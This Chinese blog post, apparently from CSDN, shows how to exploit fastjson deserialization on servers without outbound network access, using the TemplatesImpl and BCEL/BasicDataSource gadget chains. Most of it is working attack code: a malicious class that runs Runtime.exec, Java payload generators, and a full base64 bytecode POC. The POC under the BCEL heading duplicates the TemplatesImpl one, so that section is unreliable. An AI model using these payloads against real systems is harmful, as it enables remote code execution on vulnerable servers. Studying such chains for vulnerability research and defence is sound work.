fastjon不出网利用

最新推荐文章于 2024-03-03 08:16:32 发布
最新推荐文章于 2024-03-03 08:16:32 发布
阅读量680 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 java 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cardistry12138/article/details/133239419
版权

TemplatesImpl利用链

影响版本:fastjson 1.2.22 - 1.2.24

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Calc extends AbstractTranslet {

    static {

        try {
            String[] cmd = {"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }


    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}


package sec;


import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.util.IOUtils;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class FastjsonTemplatesImpl {
    public static void main(String[] args) throws IOException {

        byte[] code = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
        String byteCode  = Base64.getEncoder().encodeToString(code);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String payload = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+byteCode+"\"]," +
                "'_name':'Evil'," +
                "'_tfactory':{}," +
                "\"_outputProperties\":{}}\n";
        System.out.println(payload);
        Object object = JSON.parseObject(payload, Feature.SupportNonPublicField);
        
    }
}

POC:

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAPgoACgAoBwApCAAqCgArACwKACsALQoALgAvBwAwCgAHADEHADIHADMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA0AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAMAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAEAEGphdmEvbGFuZy9TdHJpbmcBAARjYWxjBwA1DAA2ADcMADgAOQcAOgwAOwA8AQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAPQAMAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAkACgAAAAAABAABAAsADAABAA0AAAAvAAEAAQAAAAUqtwABsQAAAAIADgAAAAYAAQAAAAcADwAAAAwAAQAAAAUAEAARAAAAAQASABMAAgANAAAAPwAAAAMAAAABsQAAAAIADgAAAAYAAQAAABcADwAAACAAAwAAAAEAEAARAAAAAAABABQAFQABAAAAAQAWABcAAgAYAAAABAABABkAAQASABoAAgANAAAASQAAAAQAAAABsQAAAAIADgAAAAYAAQAAABwADwAAACoABAAAAAEAEAARAAAAAAABABQAFQABAAAAAQAbABwAAgAAAAEAHQAeAAMAGAAAAAQAAQAZAAgAHwAMAAEADQAAAHsABAABAAAAHgS9AAJZAxIDU0u4AAQqtgAFtgAGV6cACEsqtgAIsQABAAAAFQAYAAcAAwAOAAAAGgAGAAAADAAKAA0AFQAQABgADgAZAA8AHQARAA8AAAAWAAIACgALACAAIQAAABkABAAiACMAAAAkAAAABwACWAcAJQQAAQAmAAAAAgAn"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}

BCEL字节码利用

需要依赖:

<dependency>
	<groupId>org.apache.tomcat</groupId>
	<artifactId>tomcat-dbcp</artifactId>
	<version>9.0.8</version>
</dependency>

import java.io.IOException;
public class Calc {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

package sec;

import com.alibaba.fastjson.JSON;

import com.sun.org.apache.bcel.internal.classfile.Utility;

import java.nio.file.Files;
import java.nio.file.Paths;

class fastjsonbecl {
    public static void main(String[] argv) throws Exception{
        byte[] bytes = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
        String code = Utility.encode(bytes,true);
        String poc = "{\n" +
                " {\n" +
                " \"aaa\": {\n" +
                " \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
                " \"driverClassLoader\": {\n" +
                " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
                " },\n" +
                " \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +
                " }\n" +
                " }: \"bbb\"\n" +
                "}";
        System.out.println(poc);
        JSON.parse(poc);
    }
}

POC:

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAPgoACgAoBwApCAAqCgArACwKACsALQoALgAvBwAwCgAHADEHADIHADMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA0AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAMAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAEAEGphdmEvbGFuZy9TdHJpbmcBAARjYWxjBwA1DAA2ADcMADgAOQcAOgwAOwA8AQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAPQAMAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAkACgAAAAAABAABAAsADAABAA0AAAAvAAEAAQAAAAUqtwABsQAAAAIADgAAAAYAAQAAAAcADwAAAAwAAQAAAAUAEAARAAAAAQASABMAAgANAAAAPwAAAAMAAAABsQAAAAIADgAAAAYAAQAAABcADwAAACAAAwAAAAEAEAARAAAAAAABABQAFQABAAAAAQAWABcAAgAYAAAABAABABkAAQASABoAAgANAAAASQAAAAQAAAABsQAAAAIADgAAAAYAAQAAABwADwAAACoABAAAAAEAEAARAAAAAAABABQAFQABAAAAAQAbABwAAgAAAAEAHQAeAAMAGAAAAAQAAQAZAAgAHwAMAAEADQAAAHsABAABAAAAHgS9AAJZAxIDU0u4AAQqtgAFtgAGV6cACEsqtgAIsQABAAAAFQAYAAcAAwAOAAAAGgAGAAAADAAKAA0AFQAQABgADgAZAA8AHQARAA8AAAAWAAIACgALACAAIQAAABkABAAiACMAAAAkAAAABwACWAcAJQQAAQAmAAAAAgAn"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}
c0rdXy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过Dnslog判断是否使用fastjson
XZ_______的博客
04-19 1064
扫码关注公众号获取更多资料
fastjson-c3p0:fastjson不出回显利用
03-19
fastjson-c3p0 fastjson不出回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
fastjson-BCEL不出打法原理分析
Dokii_i的博客
01-19 2001
这里fastjson提供了AutoType这种方式来指定需要还原的对象以及值 {"@type":"Java_deserialization.User","id":"123"},其中@type后面跟进的就是我们所需要还原的对象 (可控)后面跟进的id也就是这个类里面的属性,如果有一个fastjson反序列化点可控那么我们就可以随 意指定一个恶意类,如果这个恶意类里面的构造方法或者Get,Set方法调用了恶意的方法那么就会造成 反序列化漏洞。2.调用setAutoCommit方法:为什么是true?
浅析FastJson不出利用
ki10Moc的博客
11-14 2633
浅析FastJson不出利用
Fastjson不出利用
Shanfenglan's blog
02-19 5774
文章目录1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource2.com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl3. 双亲委派3.1 实现3.2 主动破坏双亲委派机制的方法3.3 为什么要破坏双亲委派3.4 为什么Tomcat要破坏双亲委派4. 参考文章 1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource 条件:BasicDataSource只需要有dbc
fastjson不出利用方案
最新发布
m0_62207482的博客
03-03 1243
Tomcat 8.0以后使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat 8.0以下使用 org.apache.tomcat.dbcp.dbcp.BasicDataSource。# 目 前 公 开 已 知 的 poc 有 两 个 : com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl。
fastjson BCEL不出打法
遇事不决冲冲冲
04-30 6489
BasicDataSource 如果目标服务器没有外、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
FastJson不出rce
yggcwhat
01-02 1175
FastJson不出rce
fastjosn1.2.12源码
08-09
fastjon-1.2.12.sources.jar source sources 源码;fastjon-1.2.12.sources.jar source sources 源码;
fast-json-escape:快速JSON字符串转义
05-15
JSON转义在JS中快速转义JSON字符串。 手动转义小的JSON字符串比使用本机更快。 主要焦点是非常快速地检查不需要转义的字符串,同时还改善了转义自身或至少不低于JSON.stringify的条件。基准测试运行基准测试( npm ...
gexin-rp-fastjson-1.0.0.1.jar
06-13
un push相关推送jar包文件,找了很久才找到,保存下,有需要的欢迎下载
fastjson
ZhiShangDeZuoMo的专栏
05-11 458
相关链接:      http://wangqiaowqo.iteye.com/blog/1958782
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5433
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
FastJson的使用
玩垃圾的人
10-13 680
今天学习了FastJson,记录下 ,避免以后忘记。 fastjson只有一个jar包,我用的是:fastjson-1.2.8.jar。 简单对象转换 List对象的转换 这里需要说明的是,转成的json是一个数组 List禁止循环的引用 在list对象中,如果加入了2个相同的对象,会进行循环引用。如果不禁止循环引用,那么到页面的数据将会变成ref那个不能解析的
FastJson各种用法
qq_41589166的博客
06-01 8333
json背景JSON在短时间内迅速风靡全球,原因有很多如WEB2.0的推动、JSON易用、高性能等等,互联科技巨头也出了自家json,google有GSON阿里有fastjson,今天我主要讲下fastjson的编程开发案例。JSON优点JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。JSON具体“自我描述性”【方便人阅读和编写。同时也易于机器解析和...
FastJson
止鱼
08-02 300
今天初步学习了Json,记录一下吧: 这次接触的Json是由Alibaba开发的基于Java的JSON处理器,主要特点是解析速度快 FastJson的入口:com.alibaba.fastjson.JSON, 他提供了一系列用于序列化、反序列化的方法: public static final Object parse(String text); // 把JSON文本parse为JSONObj
Fastjson靶场
王嘟嘟的博客
02-14 768
花了一点时间,搞了一个Fastjson的靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
Fastjson反序列化漏洞(靶场搭建复现)
hovcfuti的博客
10-10 746
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson不出怎么利用
07-28
回答: Fastjson漏洞的利用通常需要触发目标类的setter方法或满足特定条件的getter方法。在Fastjson的反序列化过程中,JSON.parse()方法会识别并调用目标类的setter方法,但并不会调用getConnection()方法。所以,如果要利用Fastjson漏洞,需要找到一个可以触发getConnection()方法的方式。\[3\]具体的利用方法因情况而异,可以通过构造恶意的JSON数据,使得Fastjson在反序列化时调用getConnection()方法,从而实现攻击目标。但需要注意的是,利用Fastjson漏洞需要对目标系统有深入的了解,并且需要遵守法律和道德规范。 #### 引用[.reference_title] - *1* *2* [fastjson-BCEL不出打法原理分析](https://blog.csdn.net/weixin_49248030/article/details/127989449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [fastjson BCEL不出打法](https://blog.csdn.net/weixin_54648419/article/details/124513950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值